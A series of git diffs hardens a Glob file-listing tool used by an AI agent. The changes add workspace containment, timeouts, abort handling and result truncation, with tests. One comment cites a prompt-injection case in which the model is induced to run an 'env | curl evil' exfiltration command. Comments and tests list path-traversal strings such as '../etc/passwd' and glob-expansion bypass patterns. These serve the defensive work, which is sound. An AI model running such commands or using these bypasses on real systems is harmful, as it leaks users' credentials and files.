+ * makes truncation a SORTED PREFIX rather than an arbitrary subset — and that
+ * distinction was a real defect, not a nicety: with a single 10 000 cap on an
+ * unsorted traversal, `Glob **\/*.ts` over a 20 000-file tree returned 10 000
+ * paths, `isError: false`, no marker, and `d00`–`d09` — half the tree, the
+ * alphabetically-first half — simply absent. A model would conclude those
+ * directories contain no TypeScript.
  */
+const GLOB_COLLECT_CEILING = 50_000
 const GLOB_MAX_MATCHES = 10_000
 
 /**
@@ -68,8 +76,18 @@ const GLOB_MAX_MATCHES = 10_000
  */
 const GLOB_TIMEOUT_DEFAULT_MS = 30_000
 function globTimeoutMs() {
-  const raw = Number(process.env.CHROXY_GLOB_TIMEOUT_MS)
-  return Number.isFinite(raw) && raw >= 0 ? raw : GLOB_TIMEOUT_DEFAULT_MS
+  // Trim and require a NON-EMPTY, strictly positive integer, matching every
+  // other env-timeout parser in this package (config.js, prompt-evaluator.js,
+  // claude-tui-session.js). The first cut used `Number(raw) >= 0`, and
+  // `Number('') === 0`: an exported-but-empty `CHROXY_GLOB_TIMEOUT_MS=` — what
+  // a bare `.env` line and `docker run -e VAR` both produce — gave every Glob
+  // call a 0 ms budget and disabled the tool outright, with nothing pointing at
+  // the cause. The knob exists to make the timeout testable; it must not be a
+  // way to switch Glob off by accident.
+  const raw = (process.env.CHROXY_GLOB_TIMEOUT_MS || '').trim()
+  if (!/^\d+$/.test(raw)) return GLOB_TIMEOUT_DEFAULT_MS
+  const n = Number(raw)
+  return n > 0 ? n : GLOB_TIMEOUT_DEFAULT_MS
 }
 
 /**
@@ -320,20 +338,47 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   // at each yield, plus a race so the TOOL CALL returns on time even when the
   // walk is between yields. The walk itself can only stop at a yield, which is
   // stated rather than papered over.
+  // #7341 — if the pattern NAMES a directory outright and that directory
+  // resolves outside the workspace, say so instead of returning "No matches".
+  //
+  // Containment itself is unchanged: every match is still confined below, and
+  // a symlink the caller merely DISCOVERED through a wildcard is still withheld
+  // in silence, because naming it would be the existence oracle that silence
+  // exists to prevent. This is the other case. When the caller writes
+  // `node_modules/**` and `node_modules` is a symlink into a pnpm store, a
+  // shared `.venv`, or a sibling repo, "No matches" is a baffling answer to a
+  // question the caller already knew the shape of — and it leaks nothing,
+  // because passing the very same path as `input.path` ALREADY returns exactly
+  // this error. It also makes `pattern` and `path` consistent rather than
+  // mysteriously different for the same directory.
+  const literalPrefix = literalDirPrefix(pattern)
+  if (literalPrefix) {
+    await safeResolveRoot(literalPrefix, realRoot, cwdRealCache, cwdCacheTtl)
+  }
+
+  // Check the signal BEFORE the walk: the in-loop check is only reached when
+  // the glob yields, so an already-aborted call on a pattern that matches
+  // nothing used to run the whole tree and then report a cheerful "No matches".
+  // The container Glob has always had this pre-check; the host lacked it, which
+  // made the two backends answer differently for identical input.
+  if (signal?.aborted) return { content: 'Glob interrupted', isError: true }
+
   const files = []
   // ONE timer sets the flag and releases the race, so the two cannot resolve
   // in either order — a second, independent timer would let the race finish
-  // before `stop` was assigned and report success on a timed-out walk.
+  // before `stop` was assigned and report success on a timed-out walk. The
+  // abort listener shares that single release for the same reason.
   let stop = null
   let releaseDeadline
   const deadlineReached = new Promise((resolve) => { releaseDeadline = resolve })
   const timeoutMs = globTimeoutMs()
   const deadline = setTimeout(() => { stop = 'timed out'; releaseDeadline() }, timeoutMs)
   deadline.unref?.()
+  const onAbort = () => { stop = 'interrupted'; releaseDeadline() }
+  signal?.addEventListener?.('abort', onAbort, { once: true })
   const collect = (async () => {
     for await (const entry of fsGlob(pattern, { cwd: realRoot, withFileTypes: true })) {
       if (stop) break
-      if (signal?.aborted) { stop = 'interrupted'; break }
       const rel = relative(realRoot, join(entry.parentPath, entry.name))
       // `**` yields the search root itself, which `relative()` renders as ''.
       // The root is not a match; emitting it produced a blank first line (and
@@ -341,7 +386,7 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
       // did.
       if (rel === '') continue
       files.push({ path: rel, isSymlink: entry.isSymbolicLink() })
-      if (files.length >= GLOB_MAX_MATCHES) break
+      if (files.length >= GLOB_COLLECT_CEILING) break
     }
   })()
   // Attach a catch BEFORE the race: if the walk rejects after the deadline has
@@ -354,6 +399,7 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
     walkError = err
   }
   clearTimeout(deadline)
+  signal?.removeEventListener?.('abort', onAbort)
   if (walkError) {
     return { content: `Glob failed: ${walkError?.message || String(walkError)}`, isError: true }
   }
@@ -368,6 +414,23 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   // per call into filesystem enumeration, on a tool that is auto-approved in
   // `acceptEdits`. The confinement is proven by tests, not by a runtime marker.
   if (kept.length === 0) return { content: `No matches for ${pattern}`, isError: false }
+
+  // Sort. Every shell glob does, on both the old host and the container;
+  // `fs.glob` yields in traversal order. Deterministic-but-different reshuffles
+  // the whole listing for a one-file change and destroys the alphabetical
+  // grouping that makes a long result readable.
+  kept.sort()
+
+  // TRUNCATION IS ANNOUNCED. The oracle argument that justifies silence for
+  // withheld matches does not apply here: a count of in-workspace matches
+  // reveals nothing about anything outside it, and silently dropping paths
+  // makes Glob wrong by omission with nothing to tell the model.
+  if (kept.length > GLOB_MAX_MATCHES) {
+    const total = files.length >= GLOB_COLLECT_CEILING ? `${kept.length}+` : `${kept.length}`
+    const shown = kept.slice(0, GLOB_MAX_MATCHES)
+    shown.push(`[truncated: showing ${GLOB_MAX_MATCHES} of ${total} matches — narrow the pattern or use "path"]`)
+    return { content: shown.join('\n'), isError: false }
+  }
   return { content: kept.join('\n'), isError: false }
 }
 
@@ -423,6 +486,24 @@ async function confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl) {
     if (ok) kept.push(f)
   }
   return kept
+}
+
+/**
+ * The leading run of LITERAL directory segments in a glob pattern — the part
+ * the caller named outright rather than asked the matcher to discover.
+ *
+ * `node_modules/**` → `node_modules`; `src/**\/*.ts` → `src`; `*.ts` → ''.
+ * The final segment is excluded: it is the basename, and confinement of the
+ * matches themselves covers it.
+ */
+function literalDirPrefix(pattern) {
+  const segments = pattern.split('/')
+  const literal = []
+  for (let i = 0; i < segments.length - 1; i++) {
+    if (/[*?[\]{}]/.test(segments[i])) break
+    literal.push(segments[i])
+  }
+  return literal.join('/')
 }
 
 /** {@link validateRawPathWithinCwd}, fail-closed on any resolution error. */

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -55,6 +55,24 @@ const BASH_TIMEOUT_CEILING_MS = 600_000
 const GLOB_MAX_MATCHES = 10_000
 
 /**
+ * Wall-clock bound on a Glob walk. Matches the 30s `executeBash` timeout the
+ * shell implementation had — dropping the subprocess dropped its kill, and
+ * `fs.glob` honours no AbortSignal of its own.
+ *
+ * Read per call, not at module load, and overridable via
+ * `CHROXY_GLOB_TIMEOUT_MS`. That knob is what lets the timeout be PROVEN: a
+ * test asserting a 30s bound by waiting 30s does not get written, and a test
+ * that only checks the happy path is a guard whose success and whose absence
+ * look identical (docs/false-safety-guards.md). A very large monorepo wanting
+ * a longer budget is the secondary use.
+ */
+const GLOB_TIMEOUT_DEFAULT_MS = 30_000
+function globTimeoutMs() {
+  const raw = Number(process.env.CHROXY_GLOB_TIMEOUT_MS)
+  return Number.isFinite(raw) && raw >= 0 ? raw : GLOB_TIMEOUT_DEFAULT_MS
+}
+
+/**
  * Env vars the model must NEVER see in a Bash subprocess. Centrally
  * the BYOK API key — if a malicious prompt induces the model to run
  * `env | curl evil`, the model exfiltrates the user's API credentials
@@ -295,19 +313,54 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   // which the traversal already knows, so the confinement below can single out
   // symlink entries for a realpath WITHOUT paying a syscall on every ordinary
   // file.
+  //
+  // `fs.glob` IGNORES an AbortSignal (measured on Node 22 — passing an
+  // already-aborted one completes normally), and dropping `executeBash` also
+  // dropped its 30s kill. So the bound is rebuilt here: a flag the loop checks
+  // at each yield, plus a race so the TOOL CALL returns on time even when the
+  // walk is between yields. The walk itself can only stop at a yield, which is
+  // stated rather than papered over.
   const files = []
-  try {
+  // ONE timer sets the flag and releases the race, so the two cannot resolve
+  // in either order — a second, independent timer would let the race finish
+  // before `stop` was assigned and report success on a timed-out walk.
+  let stop = null
+  let releaseDeadline
+  const deadlineReached = new Promise((resolve) => { releaseDeadline = resolve })
+  const timeoutMs = globTimeoutMs()
+  const deadline = setTimeout(() => { stop = 'timed out'; releaseDeadline() }, timeoutMs)
+  deadline.unref?.()
+  const collect = (async () => {
     for await (const entry of fsGlob(pattern, { cwd: realRoot, withFileTypes: true })) {
-      if (signal?.aborted) return { content: 'Glob interrupted', isError: true }
-      files.push({
-        path: relative(realRoot, join(entry.parentPath, entry.name)),
-        isSymlink: entry.isSymbolicLink(),
-      })
+      if (stop) break
+      if (signal?.aborted) { stop = 'interrupted'; break }
+      const rel = relative(realRoot, join(entry.parentPath, entry.name))
+      // `**` yields the search root itself, which `relative()` renders as ''.
+      // The root is not a match; emitting it produced a blank first line (and
+      // a bare '' on an empty workspace) that the shell implementation never
+      // did.
+      if (rel === '') continue
+      files.push({ path: rel, isSymlink: entry.isSymbolicLink() })
       if (files.length >= GLOB_MAX_MATCHES) break
     }
+  })()
+  // Attach a catch BEFORE the race: if the walk rejects after the deadline has
+  // already settled it, the rejection would otherwise be unhandled.
+  let walkError = null
+  collect.catch((err) => { walkError = err })
+  try {
+    await Promise.race([collect, deadlineReached])
   } catch (err) {
-    return { content: `Glob failed: ${err?.message || String(err)}`, isError: true }
+    walkError = err
   }
+  clearTimeout(deadline)
+  if (walkError) {
+    return { content: `Glob failed: ${walkError?.message || String(walkError)}`, isError: true }
+  }
+  if (stop === 'timed out') {
+    return { content: `Glob timed out after ${timeoutMs}ms`, isError: true }
+  }
+  if (stop === 'interrupted') return { content: 'Glob interrupted', isError: true }
   const kept = await confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl)
   // A withheld match is reported as no match, with no count and no marker.
   // Anything that distinguishes "matched, but outside" from "matched nothing"

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -18,6 +18,7 @@
  * audit).
  */
 
+import { dirname } from 'node:path'
 import { isIP } from 'node:net'
 import { lookup as dnsLookup } from 'node:dns/promises'
 import { validateRawPathWithinCwd } from './ws-file-ops/common.js'
@@ -25,6 +26,8 @@ import { executeBash, DEFAULT_BASH_TIMEOUT_MS } from './built-in-tools/bash-exec
 import { readFileTool, writeFileTool, editFileTool } from './built-in-tools/file-ops.js'
 import {
   GLOB_PATTERN_SHELL_METACHARS,
+  globPatternEscapeReason,
+  globPatternEscapeMessage,
   buildGlobCommand,
   buildGrepArgs,
   buildGrepCommand,
@@ -259,6 +262,12 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
       isError: true,
     }
   }
+  // #7341 — the metachar denylist above closes shell INJECTION only; it says
+  // nothing about where the glob expands to. Containment is a separate rule.
+  const escapeReason = globPatternEscapeReason(pattern)
+  if (escapeReason) {
+    return { content: globPatternEscapeMessage(escapeReason), isError: true }
+  }
 
   // Realpath-validate the search ROOT against cwd. Pre-fix this was a
   // weak "no ..." check that let absolute paths to /etc through.
@@ -279,8 +288,61 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
     return { content: `Glob failed: ${result.stderr || `exit ${result.exitCode}`}`, isError: true }
   }
   const files = result.stdout.split('\n').filter(Boolean)
-  if (files.length === 0) return { content: `No matches for ${pattern}`, isError: false }
-  return { content: files.join('\n'), isError: false }
+  const { kept, withheld } = await confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl)
+  const note = withheld > 0
+    ? `[${withheld} match${withheld === 1 ? '' : 'es'} outside the workspace withheld]`
+    : ''
+  if (kept.length === 0) {
+    return { content: [`No matches for ${pattern}`, note].filter(Boolean).join('\n'), isError: false }
+  }
+  return { content: [...kept, note].filter(Boolean).join('\n'), isError: false }
+}
+
+/**
+ * SECURITY (#7341) — second containment layer for Glob, after the syntactic
+ * `globPatternEscapeReason` check. Drops any expanded match whose real
+ * location is outside the workspace.
+ *
+ * Why a second layer at all: no inspection of the pattern can see a symlinked
+ * DIRECTORY sitting inside the workspace. With `esc -> /etc` present, the
+ * pattern `esc/pass*` contains no `~`, no `/` prefix and no `..` — every
+ * character is legal — and it lists `/etc`. Only resolving the RESULTS catches
+ * that, which is why the syntactic guard is not treated as sufficient here.
+ *
+ * It validates each match's PARENT directory, not the match itself, for two
+ * reasons. Cost: matches cluster into few directories, so the per-directory
+ * cache bounds this to one `open(2)`-faithful walk per unique directory
+ * instead of one per file. Correctness: a symlinked FILE whose name lives in
+ * the workspace is legitimately a workspace entry, and listing its name leaks
+ * nothing — following it is `Read`'s decision, and `Read` runs
+ * `validateRawPathWithinCwd` on it independently.
+ *
+ * FAIL-CLOSED: a match whose parent cannot be resolved (EACCES, ELOOP, depth
+ * bomb) is withheld, never emitted.
+ */
+async function confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl) {
+  const dirVerdicts = new Map()
+  const kept = []
+  let withheld = 0
+  for (const f of files) {
+    // Relative to realRoot — that is the cwd the glob expanded in. Pass the
+    // RAW relative dir (#6923: never pre-`resolve()`, a lexical `..` collapse
+    // hides a symlink escape).
+    const rawDir = dirname(f)
+    let ok = dirVerdicts.get(rawDir)
+    if (ok === undefined) {
+      try {
+        const { valid } = await validateRawPathWithinCwd(rawDir, realRoot, cwdRealCache, cwdCacheTtl)
+        ok = valid
+      } catch {
+        ok = false
+      }
+      dirVerdicts.set(rawDir, ok)
+    }
+    if (ok) kept.push(f)
+    else withheld++
+  }
+  return { kept, withheld }
 }
 
 async function runGrep({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -288,14 +288,14 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
     return { content: `Glob failed: ${result.stderr || `exit ${result.exitCode}`}`, isError: true }
   }
   const files = result.stdout.split('\n').filter(Boolean)
-  const { kept, withheld } = await confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl)
-  const note = withheld > 0
-    ? `[${withheld} match${withheld === 1 ? '' : 'es'} outside the workspace withheld]`
-    : ''
-  if (kept.length === 0) {
-    return { content: [`No matches for ${pattern}`, note].filter(Boolean).join('\n'), isError: false }
-  }
-  return { content: [...kept, note].filter(Boolean).join('\n'), isError: false }
+  const kept = await confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl)
+  // A withheld match is reported as no match, with no count and no marker.
+  // Anything that distinguishes "matched, but outside" from "matched nothing"
+  // is an existence ORACLE: a workspace that contains `esc -> /` turns one bit
+  // per call into filesystem enumeration, on a tool that is auto-approved in
+  // `acceptEdits`. The confinement is proven by tests, not by a runtime marker.
+  if (kept.length === 0) return { content: `No matches for ${pattern}`, isError: false }
+  return { content: kept.join('\n'), isError: false }
 }
 
 /**
@@ -319,11 +319,12 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
  *
  * FAIL-CLOSED: a match whose parent cannot be resolved (EACCES, ELOOP, depth
  * bomb) is withheld, never emitted.
+ *
+ * @returns {Promise<string[]>} The matches that are inside the workspace.
  */
 async function confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl) {
   const dirVerdicts = new Map()
   const kept = []
-  let withheld = 0
   for (const f of files) {
     // Relative to realRoot — that is the cwd the glob expanded in. Pass the
     // RAW relative dir (#6923: never pre-`resolve()`, a lexical `..` collapse
@@ -340,9 +341,8 @@ async function confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl) {
       dirVerdicts.set(rawDir, ok)
     }
     if (ok) kept.push(f)
-    else withheld++
   }
-  return { kept, withheld }
+  return kept
 }
 
 async function runGrep({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -18,7 +18,8 @@
  * audit).
  */
 
-import { dirname } from 'node:path'
+import { dirname, join, relative } from 'node:path'
+import { glob as fsGlob } from 'node:fs/promises'
 import { isIP } from 'node:net'
 import { lookup as dnsLookup } from 'node:dns/promises'
 import { validateRawPathWithinCwd } from './ws-file-ops/common.js'
@@ -28,7 +29,6 @@ import {
   GLOB_PATTERN_SHELL_METACHARS,
   globPatternEscapeReason,
   globPatternEscapeMessage,
-  buildGlobCommand,
   buildGrepArgs,
   buildGrepCommand,
 } from './built-in-tools/tool-transforms.js'
@@ -46,6 +46,13 @@ import { isPrivateOrSpecialIp } from './ssrf-guard.js'
  * hangs.
  */
 const BASH_TIMEOUT_CEILING_MS = 600_000
+
+/**
+ * Cap on how many matches Glob collects. The shell implementation was bounded
+ * only by executeBash's ~1MB stdout cap; this makes the same bound explicit so
+ * a `**\/*` over a node_modules tree cannot balloon the session's memory.
+ */
+const GLOB_MAX_MATCHES = 10_000
 
 /**
  * Env vars the model must NEVER see in a Bash subprocess. Centrally
@@ -273,21 +280,34 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   // weak "no ..." check that let absolute paths to /etc through.
   const realRoot = await safeResolveRoot(input?.path, cwd, cwdRealCache, cwdCacheTtl)
 
-  // Shell expansion of `for f in <pattern>` is what produces the file
-  // paths. Pattern is now whitelist-validated above, so interpolation
-  // is safe.
-  const cmd = buildGlobCommand(pattern, realRoot)
-  const result = await executeBash({
-    command: cmd,
-    cwd: realRoot,
-    signal,
-    timeoutMs: 30_000,
-    env: buildSafeBashEnv(),
-  })
-  if (result.exitCode !== 0 && !result.stdout) {
-    return { content: `Glob failed: ${result.stderr || `exit ${result.exitCode}`}`, isError: true }
+  // #7341 — the host does NOT shell out for Glob any more. `for f in
+  // <pattern>` needed the pattern interpolated UNQUOTED to expand at all, and
+  // two review rounds found six ways to make that expansion leave the
+  // workspace (quote removal, whitespace word-splitting, a brace body with no
+  // top-level comma, `.*` matching the `..` entry, POSIX bracket
+  // sub-expressions, nested braces) — none of them visible in the source text.
+  // `node:fs/promises`'s glob has none of those layers: no tilde expansion, no
+  // word splitting, no quote removal. The question "what will bash do with
+  // this string" simply stops being asked. (The container still shells out —
+  // it cannot run JS inside itself — and confines its RESULTS instead.)
+  //
+  // `withFileTypes` is not cosmetic: the Dirent carries `isSymbolicLink()`,
+  // which the traversal already knows, so the confinement below can single out
+  // symlink entries for a realpath WITHOUT paying a syscall on every ordinary
+  // file.
+  const files = []
+  try {
+    for await (const entry of fsGlob(pattern, { cwd: realRoot, withFileTypes: true })) {
+      if (signal?.aborted) return { content: 'Glob interrupted', isError: true }
+      files.push({
+        path: relative(realRoot, join(entry.parentPath, entry.name)),
+        isSymlink: entry.isSymbolicLink(),
+      })
+      if (files.length >= GLOB_MAX_MATCHES) break
+    }
+  } catch (err) {
+    return { content: `Glob failed: ${err?.message || String(err)}`, isError: true }
   }
-  const files = result.stdout.split('\n').filter(Boolean)
   const kept = await confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl)
   // A withheld match is reported as no match, with no count and no marker.
   // Anything that distinguishes "matched, but outside" from "matched nothing"
@@ -309,40 +329,57 @@ async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
  * character is legal — and it lists `/etc`. Only resolving the RESULTS catches
  * that, which is why the syntactic guard is not treated as sufficient here.
  *
- * It validates each match's PARENT directory, not the match itself, for two
- * reasons. Cost: matches cluster into few directories, so the per-directory
- * cache bounds this to one `open(2)`-faithful walk per unique directory
- * instead of one per file. Correctness: a symlinked FILE whose name lives in
- * the workspace is legitimately a workspace entry, and listing its name leaks
- * nothing — following it is `Read`'s decision, and `Read` runs
- * `validateRawPathWithinCwd` on it independently.
+ * The property it establishes is the strong one, stated without caveats:
+ * EVERY path Glob returns resolves inside the workspace. An earlier cut
+ * checked only each match's parent directory, which let a symlink whose NAME
+ * is in the workspace but whose TARGET is outside be listed. That is arguably
+ * defensible — the entry really is in the directory, and `Read` would refuse
+ * to follow it — but it makes the tool's contract a sentence with an
+ * exception in it, and the property test caught it precisely because the
+ * exception could not be stated cleanly. Withholding it costs a listing
+ * nobody can act on.
  *
- * FAIL-CLOSED: a match whose parent cannot be resolved (EACCES, ELOOP, depth
- * bomb) is withheld, never emitted.
+ * Two checks, split so the common case is free:
+ *   - the match's PARENT, cached per directory. Catches traversal and any
+ *     descent through a symlinked directory. Matches cluster into few
+ *     directories, so this is one `open(2)`-faithful walk per directory, not
+ *     one per file.
+ *   - the ENTRY itself, but only when the glob's own Dirent already said it is
+ *     a symlink. Ordinary files — nearly all of them — cost nothing extra.
  *
+ * FAIL-CLOSED: a match that cannot be resolved (EACCES, ELOOP, depth bomb) is
+ * withheld, never emitted.
+ *
+ * @param {{path: string, isSymlink: boolean}[]} files
  * @returns {Promise<string[]>} The matches that are inside the workspace.
  */
 async function confineGlobMatches(files, realRoot, cwdRealCache, cwdCacheTtl) {
   const dirVerdicts = new Map()
   const kept = []
-  for (const f of files) {
-    // Relative to realRoot — that is the cwd the glob expanded in. Pass the
-    // RAW relative dir (#6923: never pre-`resolve()`, a lexical `..` collapse
+  for (const { path: f, isSymlink } of files) {
+    // Relative to realRoot — that is the directory the glob ran in. Pass the
+    // RAW relative path (#6923: never pre-`resolve()`, a lexical `..` collapse
     // hides a symlink escape).
     const rawDir = dirname(f)
     let ok = dirVerdicts.get(rawDir)
     if (ok === undefined) {
-      try {
-        const { valid } = await validateRawPathWithinCwd(rawDir, realRoot, cwdRealCache, cwdCacheTtl)
-        ok = valid
-      } catch {
-        ok = false
-      }
+      ok = await isWithin(rawDir, realRoot, cwdRealCache, cwdCacheTtl)
       dirVerdicts.set(rawDir, ok)
     }
+    if (ok && isSymlink) ok = await isWithin(f, realRoot, cwdRealCache, cwdCacheTtl)
     if (ok) kept.push(f)
   }
   return kept
+}
+
+/** {@link validateRawPathWithinCwd}, fail-closed on any resolution error. */
+async function isWithin(rawPath, realRoot, cwdRealCache, cwdCacheTtl) {
+  try {
+    const { valid } = await validateRawPathWithinCwd(rawPath, realRoot, cwdRealCache, cwdCacheTtl)
+    return valid
+  } catch {
+    return false
+  }
 }
 
 async function runGrep({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {

--- a/packages/server/src/byok-tools.js
+++ b/packages/server/src/byok-tools.js
@@ -122,7 +122,9 @@ export const BUILTIN_TOOLS = [
     name: 'Glob',
     description:
       'List files matching a glob pattern. Pattern is shell-style (e.g. `**/*.ts`, `packages/server/src/*.js`). ' +
-      '`path` is the search root (default: workspace cwd). Returns file paths relative to the search root.',
+      '`path` is the search root (default: workspace cwd). Returns file paths relative to the search root. ' +
+      'The pattern must stay inside the workspace: a leading `/`, a `~`, or a `..` segment is rejected (#7341) — ' +
+      'use `path` to search a subdirectory.',
     input_schema: {
       type: 'object',
       properties: {

--- a/packages/server/src/byok-tools.js
+++ b/packages/server/src/byok-tools.js
@@ -124,7 +124,8 @@ export const BUILTIN_TOOLS = [
       'List files matching a glob pattern. Pattern is shell-style (e.g. `**/*.ts`, `packages/server/src/*.js`). ' +
       '`path` is the search root (default: workspace cwd). Returns file paths relative to the search root. ' +
       'The pattern must stay inside the workspace: a leading `/`, a `~`, or a `..` segment is rejected (#7341) — ' +
-      'use `path` to search a subdirectory.',
+      'use `path` to search a subdirectory. A literal space is also rejected; `**/*.pdf` still reaches ' +
+      'into directories whose names contain spaces.',
     input_schema: {
       type: 'object',
       properties: {

--- a/packages/server/src/byok-tools.js
+++ b/packages/server/src/byok-tools.js
@@ -122,10 +122,12 @@ export const BUILTIN_TOOLS = [
     name: 'Glob',
     description:
       'List files matching a glob pattern. Pattern is shell-style (e.g. `**/*.ts`, `packages/server/src/*.js`). ' +
-      '`path` is the search root (default: workspace cwd). Returns file paths relative to the search root. ' +
-      'The pattern must stay inside the workspace: a leading `/`, a `~`, or a `..` segment is rejected (#7341) — ' +
-      'use `path` to search a subdirectory. A literal space is also rejected; `**/*.pdf` still reaches ' +
-      'into directories whose names contain spaces.',
+      '`path` is the search root (default: workspace cwd). Returns sorted file paths relative to the search root. ' +
+      'Results are confined to the workspace: a leading `/`, a `~`, a `..` segment or a literal space is rejected, ' +
+      'and any match resolving outside the workspace is withheld (#7341). Use `path` to search a subdirectory; ' +
+      '`**/*.pdf` still reaches into directories whose names contain spaces. Naming a directory that resolves ' +
+      'outside the workspace (a symlink to a shared store, for example) is an error rather than an empty result. ' +
+      'Very large results are truncated to a sorted prefix with an explicit trailing marker.',
     input_schema: {
       type: 'object',
       properties: {

--- a/packages/server/src/docker-byok-session.js
+++ b/packages/server/src/docker-byok-session.js
@@ -2052,9 +2052,15 @@ export class DockerByokSession extends ClaudeByokSession {
     // strictly better (a realpath walk per match); from out here the matches
     // are inside the container, so lexical is what is reachable.
     //
-    // RESIDUAL, tracked separately: a symlinked directory inside /workspace
+    // RESIDUAL, tracked by #7354: a symlinked directory inside /workspace
     // (`esc -> /etc` in the CONTAINER's filesystem) produces a lexically clean
-    // match that resolves out. Closing it needs the match resolved in-container.
+    // match that resolves out. Closing it needs the match resolved in-container,
+    // and it is reachable through `input.path` as well as `pattern` — that route
+    // is shared with _containerGrep/_containerRead, so it is wider than Glob.
+    //
+    // This comment said "tracked separately" while nothing tracked it, which is
+    // the same false-safety shape as the bug above: an assertion of a stronger
+    // state than reality, in a place no test can check. The issue now exists.
     //
     // Withheld matches read as no match — no count, no marker. Anything that
     // distinguishes "matched, but outside" from "matched nothing" is an

--- a/packages/server/src/docker-byok-session.js
+++ b/packages/server/src/docker-byok-session.js
@@ -131,6 +131,7 @@ import {
   GLOB_PATTERN_SHELL_METACHARS,
   globPatternEscapeReason,
   globPatternEscapeMessage,
+  globMatchEscapesRoot,
   buildGlobCommand,
   buildGrepArgs,
   buildGrepCommand,
@@ -2043,7 +2044,22 @@ export class DockerByokSession extends ClaudeByokSession {
     if (!stdout && stderr && stderr.trim()) {
       return { content: `Glob failed: ${stderr.trim()}`, isError: true }
     }
-    const files = stdout.split('\n').filter(Boolean)
+    // #7341 — confine the RESULTS, not just the pattern. This is the layer
+    // that actually holds: it inspects what the shell PRODUCED (a leading `/`
+    // or a `..` segment) rather than trying to predict what it will produce,
+    // and every one of the six expansion bypasses found in review is plainly
+    // visible here while being invisible in the pattern text. The host does
+    // strictly better (a realpath walk per match); from out here the matches
+    // are inside the container, so lexical is what is reachable.
+    //
+    // RESIDUAL, tracked separately: a symlinked directory inside /workspace
+    // (`esc -> /etc` in the CONTAINER's filesystem) produces a lexically clean
+    // match that resolves out. Closing it needs the match resolved in-container.
+    //
+    // Withheld matches read as no match — no count, no marker. Anything that
+    // distinguishes "matched, but outside" from "matched nothing" is an
+    // existence oracle on a tool auto-approved in `acceptEdits`.
+    const files = stdout.split('\n').filter(Boolean).filter((f) => !globMatchEscapesRoot(f))
     if (files.length === 0) return { content: `No matches for ${pattern}`, isError: false }
     return { content: files.join('\n'), isError: false }
   }

--- a/packages/server/src/docker-byok-session.js
+++ b/packages/server/src/docker-byok-session.js
@@ -129,6 +129,8 @@ import { ClaudeByokSession } from './byok-session.js'
 import {
   applyEdit,
   GLOB_PATTERN_SHELL_METACHARS,
+  globPatternEscapeReason,
+  globPatternEscapeMessage,
   buildGlobCommand,
   buildGrepArgs,
   buildGrepCommand,
@@ -2018,6 +2020,17 @@ export class DockerByokSession extends ClaudeByokSession {
         content: 'EINVAL: glob pattern contains shell-dangerous characters',
         isError: true,
       }
+    }
+    // #7341 — same containment rule as the host Glob, from the same shared
+    // validator, so the two cannot drift. Here it is the ONLY layer: the host
+    // additionally realpath-confines the expanded matches, which is impossible
+    // from out here because the matches are produced inside the container.
+    // What it escapes into is the container filesystem (the image's /etc, the
+    // container user's ~), not the host's — lower severity than the host hole,
+    // same defect.
+    const escapeReason = globPatternEscapeReason(pattern)
+    if (escapeReason) {
+      return { content: globPatternEscapeMessage(escapeReason), isError: true }
     }
     if (signal?.aborted) {
       return { content: 'Interrupted before docker exec', isError: true }

--- a/packages/server/tests/built-in-tools/tool-transforms.test.js
+++ b/packages/server/tests/built-in-tools/tool-transforms.test.js
@@ -6,6 +6,7 @@ import {
   GLOB_PATTERN_SHELL_METACHARS,
   globPatternEscapeReason,
   globPatternEscapeMessage,
+  globMatchEscapesRoot,
   buildGlobCommand,
   buildGrepArgs,
   buildGrepCommand,
@@ -258,5 +259,47 @@ describe('globPatternEscapeReason — brace-expansion ceilings (#7341)', () => {
     for (const bad of [undefined, null, 42, {}]) {
       assert.notEqual(globPatternEscapeReason(bad), null)
     }
+  })
+})
+
+describe('globMatchEscapesRoot (#7341)', () => {
+  // This is the container Glob's containment boundary. It inspects what the
+  // expansion PRODUCED rather than predicting what it will produce — which is
+  // why it catches all six of the bypasses that were found against the
+  // pattern-prediction guard, none of which are visible in the pattern text.
+  const ESCAPES = [
+    '/etc/passwd',                 // absolute — `''/etc/pass*`, `* /etc/pass*`
+    '../etc/passwd',               // `'..'/x`, `.[[:punct:]]/x`, `{a}b,../x}`
+    '../../etc/passwd',            // `.*` matching the `..` entry, twice
+    'src/../../etc/passwd',
+    '..',
+    'a/..',
+    '/',
+  ]
+  for (const m of ESCAPES) {
+    it(`withholds ${JSON.stringify(m)}`, () => {
+      assert.equal(globMatchEscapesRoot(m), true)
+    })
+  }
+
+  const CONTAINED = [
+    'a.ts',
+    'src/a.ts',
+    './a.ts',
+    'src/.env',
+    'report..final.md',            // `..` inside a NAME is not a segment
+    'v1..v2/x.diff',
+    '.github/workflows/ci.yml',
+    'a b.txt',                     // a space in a filename is not an escape
